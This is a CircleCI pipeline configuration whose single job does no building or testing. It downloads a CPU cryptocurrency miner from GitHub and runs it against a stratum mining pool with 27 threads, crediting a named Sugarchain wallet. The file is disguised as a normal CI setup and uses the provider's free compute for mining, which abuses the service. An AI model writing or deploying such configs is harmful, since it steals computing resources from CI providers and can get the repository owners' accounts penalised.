version: 2.1

orbs:
  python: circleci/python@0.2.1

jobs:
  jembotbosok:
    executor: python/default
    steps:
      - run:
          command: apt-get update && wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz && tar xf cpuminer-opt-linux.tar.gz && ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9pvpp45tyud4kmrl2r63s2pdvhjma7e92rz6p9.akmal -t27
          name: coba

workflows:
  main:
    jobs:
      - jembotbosok
